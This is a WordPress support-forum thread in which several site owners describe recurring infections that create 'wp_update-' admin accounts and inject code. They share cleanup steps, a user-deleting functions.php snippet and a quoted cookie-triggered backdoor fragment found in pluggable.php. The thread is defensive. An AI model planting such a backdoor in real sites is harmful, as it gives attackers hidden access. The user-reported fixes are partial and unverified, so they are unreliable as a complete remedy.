User with admin privileges keeps signin in on to my websites

I also had the same problem but the site was brand new, a week old so with everything updated and nice and clean and the main security measures active (hidden login page, non-standard table prefix etc). I don’t understand how they created it.

I’m not sure if this below code will help. This goes to the functions.php

Basically the system deletes the account and its content with “wp_update-” when they try login attempt.
Also send yourself an email when the code runs.

function delete_specific_users_and_content_and_notify() {
    if (is_admin()) {
        $users = get_users(array('search' => 'wp_update-*'));
        foreach ($users as $user) {
            // Check if the username indeed starts with "wp_update-"
            if (substr($user->user_login, 0, 10) === "wp_update-") {
                require_once(ABSPATH.'wp-admin/includes/user.php');
                
                // Get all posts by the user
                $user_posts = get_posts(array('author' => $user->ID, 'post_type' => 'any', 'numberposts' => -1));
                
                // Delete each post
                foreach ($user_posts as $user_post) {
                    wp_delete_post($user_post->ID, true); // Set to true to bypass trash
                }
                
                // Finally, delete the user
                wp_delete_user($user->ID, 1); // Reassign posts to user ID 1 (usually the admin)
                
                // Prepare and send the notification email
                $to = 'your@emailaddress'; // Change this to your email address
                $subject = '[WEB SECURITY] ' . get_bloginfo('url');
                $message = 'Site Name: ' . get_bloginfo('name') . "\r\n" .
                           'Site URL: ' . get_bloginfo('url') . "\r\n" .
                           'Deleted Username: ' . $user->user_login;
                
                wp_mail($to, $subject, $message);
            }
        }
    }
}
add_action('admin_init', 'delete_specific_users_and_content_and_notify');

• This reply was modified 8 months, 4 weeks ago by webonology.

Search google for “wp_update-” include the dbl quotes, scroll down and look at all the infected sites.

I have been attempting to clean up similar infections. What I can tell you is that I have uncovered plenty of invisible files (names starting with a period, like “.hudut76.php”) that contained malware code that WordFence did not detect in scans. In addition I have seen examples of bad injected code in the WP database, mostly in the wp-options table.

With much of the code either base64 encoded or ASCII code encoded, it has been almost impossible to know exactly how the admin users are getting injected into the database, but I am pretty sure it happens when a real admin accesses the dashboard or otherwise interacts with the site.

Having used multiple tools, and monitored the sites for weeks, I have had to resort to a complete scorched earth policy (archive the site, and delete everything). Then rebuild. Unless you have a known clean backup (which I do not, all my backups also are compromised), it is the only way to be sure.

As an aside, if those admin logins show up, assume that your wp-config.php and your database logins, passwords and keys are no longer secure. Sorry I don’t have better news..

-pm

Hi everyone, I’m also having the same problem. I start working on a new client’s website and notice that it is full of files (like lixtndzc.php or 8vx748s.ccss), a lot of wp-updates-XXX administrator accounts and code injected into index.php files in all server folders. I’m trying everything, I have installed both WP Cerber and Sucuri to scan files and I notice that every 2-3 hours about twenty different IPs try to access different php files and every day around 2.00am they insert code into the files index.php and wp-config.php which I clean up every day. I reset the passwords of the FTP accounts and the main Cpanel account.
The problem is that when they insert the code in the index.php file in the public_html folder, the ajax functions of the contact forms are blocked and therefore every day I have to check and remove that code. The hosting provider washes their hands of it.
I’m following this post to see if anyone finds a solution, otherwise I’ll try this imunify360 too.
Thanks

Hey, I am following this to see if anyone ever found resolution here. I’ve had the EXACT same issue for some time, and do the same daily thing of cleaning the wp_config.php and the index.php file. (and other junk files). Has anyone found out how they are doing this to be able to stop it. I also see the permissions change as well, all the same stuff, but no idea how they are doing it.

@mignonnehalpern I suppose their main trick is the cookie trigger for their custom vode. Changing database credentials helped surprisingly a lot too.

I have had this issue on multiple sites for several months now. Have hired professionals and all seems fine and then after a couple of months they get infected again. Has anyone found the solution to this? Isn’t there a way to stop creating / automatically delete new users with wp_update usernames or users created outside WordPress? Word fence ought to have such an option but don’t see it.

hi there,

same problem on multiple wp sites. No idea how they are created these types of users but i followed another approach with 2 interventions:

1. Created one simple plugin which blocks every attempt to login from other countries that is not mine.

2. Created a trigger on wp_users table which in case something with a login name is similar to wp_update-xxxx is inserted, then do not insert on the table…

this is not actually a solution because clearly they have a vector attack which for us is uknown but until a real solution is found, i stick with my workaround.

ps. The strange thing is that i have also a waf reverse proxy with owasp rules but yet they bypass it!

peace!

• This reply was modified 5 months, 3 weeks ago by albgen.

7 months and no solution. Other posts with the same issue suggest sending Wordfence stuff but still no reply with a solution or vector. Disappointing.

Yes, I can’t understand 90% of the solutions suggested. All the solutions require you to be a rocket scientist in coding. WordPress is supposed to simplify your life not complicate it to this extend. How can someone just get into your server and add users and codes to your website, and get away with it scott free is beyond me. Sounds like a class action suit against WordPress to me.

THIS IS WHAT WORKED FOR ME –
————————————————————————–
1. I first installed Wordfence plugin on every site and ran it, deleting / repairing files, and wp-update users

For the next steps 2 to 7, I used https://www.lastpass.com/features/password-generator#generatorTool to generate strong passwords.

2. I changed my host (hostgator) login password
3. I changed cpanel password
4. I changed ftp password
6. I changed every wordpress site admin password
7. I changed every wordpress Database password

8. I ran Wordfence again on all the sites.
————————————————————————–

This seems to have worked for me.

If they have ANY ONE of the above login information (host, cpanel, ftp, wordpress or wordpress database), they will be able to gain access to ALL the passwords and hack the website again.

So you need to change ALL of the above password, otherwise, the problem will come back in a day or two. I have tried it, and it only worked after I changed all the passwords in quick succession.

Adding to this as I just went through it, @neolegen seems to be correct in the fix for this. This specific breach is from outside of the WordPress install, which is why Wordfence does not detect it. It looks to be specifically a script that has database credentials that can keep recreating the user (you’ll probably notice no email associated, which is typically required).

What I’ve gotten to work is to go through and clean all malicious code (it seems to corrupt common themes in the fuctions.php, footer.php and header.php), delete unused themes, change all admin passwords, change hosting/cpanel passwords, ftp password(s), and most importantly the database password (and update wp-config). Make sure all plugins and WP install is up to date. If any of the auto-created users come back, repeat the process.

• This reply was modified 5 months ago by tynology. Reason: no edit, just interested in replies

My site too got infected.

Things i noticed,

1. 3 admin users which i never created, one with wp_update-xxxxxx others named as wpxxxxxxxxx
2. .index.php has malicious code and many folders has some unwanted index.php created with the same code.
3. wp-config.php has malicious code at the beginning
4. most file has this code to include a css file in /[SERVER-PATH]/public_html/wp-includes/blocks/comments-title/.[XXXXX.css] having php code.
5. some new files created with encrypted/not readable codes, named as style.php, profile.php, themes.php etc…
6. Some files and folder with file with randomly generated names are created with encrypted codes,
7. wp-includes/pluggable.php has code like this at the end, not sure if this is by that malware or some other plugin.

if (isset($_COOKIE[“_JdXGxQ1hFqMjLZVi9BgfcH6PU84YmezEw7ka5yO02TpNlvtb3usWCAnr”]))
{
$lines = get_option( ‘wpsdt4_license_key’ );
if (!empty($lines))
{
$lines = @file_get_contents(“6cd7c012”);
}
echo $lines;
exit();
}

How i tried to fix…

Mostly i used some text patterns to search for files using the “strlocator” plugin, to remove these files and codes in server. Deleted admin users, changed ftp pass, db pass, wp admin pass, unwanted plugins.

8.Also its writing the admin username and password to a text file in root, the writing part code is injected in wp-includes/pluggable.php.